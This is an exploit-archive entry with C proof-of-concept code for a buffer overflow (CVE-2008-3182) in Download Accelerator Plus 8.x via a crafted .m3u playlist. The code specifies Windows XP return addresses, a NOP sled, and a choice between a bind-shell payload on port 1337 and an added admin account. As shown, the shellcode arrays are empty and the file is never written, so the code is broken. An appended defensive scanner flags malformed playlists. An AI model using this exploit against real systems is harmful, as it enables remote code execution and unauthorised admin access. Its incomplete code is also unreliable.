Download Accelerator Plus DAP 8.x - '.m3u' File Buffer Overflow

Related Vulnerabilities: CVE-2008-3182  
Publish Date: 11 Jul 2008
Author: Shinnok

#include <stdio.h>
#include <stdlib.h>
/*
DAP 8.x (.m3u) File BOF C Exploit for XP SP2, SP3 English

SecurityFocus Advisory:
Download Accelerator Plus (DAP) is prone to a buffer-overflow vulnerability
because it fails to perform adequate boundary checks on user-supplied input.
Successfully exploiting this issue may allow remote attackers to execute
arbitrary code in the context of the application. Failed exploit attempts
will cause denial-of-service conditions.

Vulnerability discovered by Krystian Kloskowski (h07) <>
Original POC by h07

This PoC will create a "special" .m3u file that, when imported in DAP and then checked with
the verify button, will cause a buffer overflow and lead to exploitation. Run the program
with no args for usage info or just look in the code. :P

Tested on Windows XP English SP2 and SP3.

C Exploit code by Shinnok raydenxy [at] yahoo dot com
*/

/* win32_bind -  EXITFUNC=seh LPORT=1337 Size=709 Encoder=PexAlphaNum */
unsigned char bind_scode[] =

/* win32_adduser -  PASS=test EXITFUNC=seh USER=test Size=489 Encoder=PexAlphaNum */
unsigned char user_scode[] =

unsigned char ra_sp2[] = "\xcf\xbc\x08\x76"; //msvcp60.dll
unsigned char ra_sp3[] = "\xe1\xbc\x08\x76"; //msvcp60.dll

unsigned char nops1[14115]; //14115 * \x90
unsigned char nops2[30]; //30 * \x90

int main(int argc, char **argv)
{
    int i;
    FILE* f;
    char* ra=NULL;
    char* scode=NULL;
    printf("[+] Download Accelerator Plus - DAP 8.x (.m3u) File Buffer Overflow Vulnerability\n");
    printf("[+] Discovered by Krystian Kloskowski (h07) <>\n");
    printf("[+] Code by Shinnok raydenxy[at]yahoo dot com\n");
    if ((argc!=3)||((atoi(argv[1])!=0)&&(atoi(argv[1])!=1))||((atoi(argv[2])!=0)&&(atoi(argv[2])!=1))){
        printf("Usage: %s target payload\n",argv[0]);
        printf("Where target is:\n");
        printf("0: WinXP SP2\n");
        printf("1: WinXP SP3\n");
        printf("Where payload is:\n");
        printf("0: bind shell on 1337\n");
        printf("1: add admin user \"test\" with password \"test\"\n");
        return EXIT_SUCCESS;
    }
    for(i=0;i<14115;i++) nops1[i]='\x90';
    for(i=0;i<30;i++) nops2[i]='\x90';
    if(atoi(argv[1])==0) ra=ra_sp2;
    else ra=ra_sp3;
    if(atoi(argv[2])==0) scode=bind_scode;
    else scode=user_scode;
    printf("sploit.m3u created!\n");
    return EXIT_SUCCESS;
}

// [2008-07-11]
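
A defensive check for the kind of malformed playlist this PoC generates, as an added example that is not part of the original exploit or the advisory: it scans a playlist buffer and flags overlong entries or long runs of one non-printable byte, such as the 14115-byte 0x90 filler above. The function name, verdict names and both thresholds are assumptions chosen for illustration, and the sample input is constructed.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Assumed policy limits (not taken from the advisory); tune per environment. */
#define M3U_MAX_ENTRY 2048  /* longest playlist line accepted, in bytes */
#define M3U_MAX_FILL  16    /* longest run of one repeated non-printable byte */

enum m3u_verdict { M3U_OK = 0, M3U_LONG_ENTRY = 1, M3U_BINARY_FILL = 2 };

/* Scan a playlist held in memory. Returns the first problem found and, if
 * line_no is non-NULL, stores the 1-based line it occurred on (0 when clean). */
enum m3u_verdict m3u_check(const unsigned char *buf, size_t len, size_t *line_no)
{
    size_t line = 1, entry_len = 0, run = 0;
    unsigned char prev = 0;
    enum m3u_verdict v = M3U_OK;

    for (size_t i = 0; i < len && v == M3U_OK; i++) {
        unsigned char c = buf[i];
        if (c == '\n') { line++; entry_len = 0; run = 0; continue; }
        /* Bytes outside printable ASCII; tab and CR are tolerated. */
        int binary = (c < 0x20 && c != '\t' && c != '\r') || c >= 0x7f;
        run = !binary ? 0 : (run && c == prev) ? run + 1 : 1;
        prev = c;
        if (++entry_len > M3U_MAX_ENTRY) v = M3U_LONG_ENTRY;
        else if (run > M3U_MAX_FILL)     v = M3U_BINARY_FILL;
    }
    if (line_no) *line_no = (v == M3U_OK) ? 0 : line;
    return v;
}

int main(void)
{
    /* Constructed sample: a header line, then one entry of filler bytes only. */
    static unsigned char sample[8 + 14115];
    size_t line;
    memcpy(sample, "#EXTM3U\n", 8);
    memset(sample + 8, 0x90, 14115);
    enum m3u_verdict v = m3u_check(sample, sizeof sample, &line);
    printf("verdict=%d line=%zu\n", (int)v, line);
    return 0;
}
```

A parser that enforces the same length bound before copying an entry into a fixed-size buffer addresses the missing boundary check directly; the scanner is useful for triaging playlist files at a gateway or on disk.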